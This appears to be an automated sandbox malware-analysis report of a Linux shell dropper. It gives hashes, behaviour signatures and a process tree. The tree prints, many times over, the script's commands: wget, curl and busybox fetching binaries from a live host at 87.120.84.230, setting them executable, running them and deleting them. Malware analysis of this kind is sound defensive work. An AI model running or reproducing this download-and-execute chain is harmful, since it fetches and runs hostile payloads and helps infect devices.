DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/820-1-0xb6705000-0xb6716044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-25 01:26

Reported

2024-10-25 01:29

Platform

debian9-mipsbe-20240611-en

Max time kernel

67s

Max time network

68s

Command Line

[/tmp/3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z N/A
N/A /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO N/A
N/A /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S N/A
N/A /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME N/A
N/A /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV N/A
N/A /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH N/A
N/A /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal N/A
N/A /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V N/A
N/A /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS N/A
N/A /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm N/A
N/A /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ N/A
N/A /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv N/A
N/A /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 N/A
N/A /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj N/A
N/A /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm N/A
N/A /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ N/A
N/A /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv N/A
N/A /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 N/A
N/A /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj N/A
N/A /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z N/A
N/A /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO N/A
N/A /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S N/A
N/A /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME N/A
N/A /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV N/A
N/A /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH N/A
N/A /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal N/A
N/A /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V N/A
N/A /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /usr/bin/curl N/A
File opened for modification /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /usr/bin/curl N/A
File opened for modification /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /usr/bin/curl N/A
File opened for modification /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /usr/bin/curl N/A
File opened for modification /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /usr/bin/curl N/A
File opened for modification /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /usr/bin/curl N/A
File opened for modification /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /usr/bin/curl N/A
File opened for modification /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /usr/bin/curl N/A
File opened for modification /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /usr/bin/curl N/A
File opened for modification /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /usr/bin/curl N/A
File opened for modification /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /usr/bin/curl N/A
File opened for modification /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /usr/bin/curl N/A
File opened for modification /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /usr/bin/curl N/A
File opened for modification /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /usr/bin/curl N/A
File opened for modification /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /usr/bin/curl N/A
File opened for modification /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /usr/bin/curl N/A
File opened for modification /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /usr/bin/curl N/A
File opened for modification /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /usr/bin/curl N/A
File opened for modification /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /usr/bin/curl N/A
File opened for modification /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /usr/bin/curl N/A
File opened for modification /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /usr/bin/curl N/A
File opened for modification /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /usr/bin/curl N/A
File opened for modification /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /usr/bin/curl N/A
File opened for modification /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /usr/bin/curl N/A
File opened for modification /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /usr/bin/curl N/A
File opened for modification /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /usr/bin/curl N/A
File opened for modification /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /usr/bin/curl N/A
File opened for modification /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /usr/bin/curl N/A

Processes

/tmp/3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh

[/tmp/3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/chmod

[chmod 777 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z

[./SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/rm

[rm SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/usr/bin/wget

[wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/chmod

[chmod 777 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO

[./nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/rm

[rm nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/usr/bin/wget

[wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/chmod

[chmod 777 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S

[./PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/rm

[rm PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/usr/bin/wget

[wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/chmod

[chmod 777 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME

[./hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/rm

[rm hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/usr/bin/wget

[wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/chmod

[chmod 777 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV

[./8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/rm

[rm 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/usr/bin/wget

[wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/chmod

[chmod 777 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH

[./TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/rm

[rm TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/usr/bin/wget

[wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/chmod

[chmod 777 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal

[./fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/rm

[rm fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/usr/bin/wget

[wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/chmod

[chmod 777 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V

[./WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/rm

[rm WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/usr/bin/wget

[wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/chmod

[chmod 777 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS

[./Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/rm

[rm Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/usr/bin/wget

[wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/chmod

[chmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm

[./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/rm

[rm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/wget

[wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/chmod

[chmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ

[./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/rm

[rm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/wget

[wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/chmod

[chmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv

[./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/rm

[rm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/wget

[wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/chmod

[chmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8

[./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/rm

[rm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/wget

[wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/chmod

[chmod 777 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj

[./yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/rm

[rm yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/usr/bin/wget

[wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/chmod

[chmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm

[./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/rm

[rm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/wget

[wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/chmod

[chmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ

[./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/rm

[rm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/wget

[wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/chmod

[chmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv

[./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/rm

[rm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/wget

[wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/chmod

[chmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8

[./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/rm

[rm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/wget

[wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/chmod

[chmod 777 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj

[./yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/rm

[rm yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/usr/bin/wget

[wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/chmod

[chmod 777 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z

[./SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/rm

[rm SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/usr/bin/wget

[wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/chmod

[chmod 777 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO

[./nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/rm

[rm nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/usr/bin/wget

[wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/chmod

[chmod 777 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S

[./PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/rm

[rm PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/usr/bin/wget

[wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/chmod

[chmod 777 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME

[./hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/rm

[rm hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/usr/bin/wget

[wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

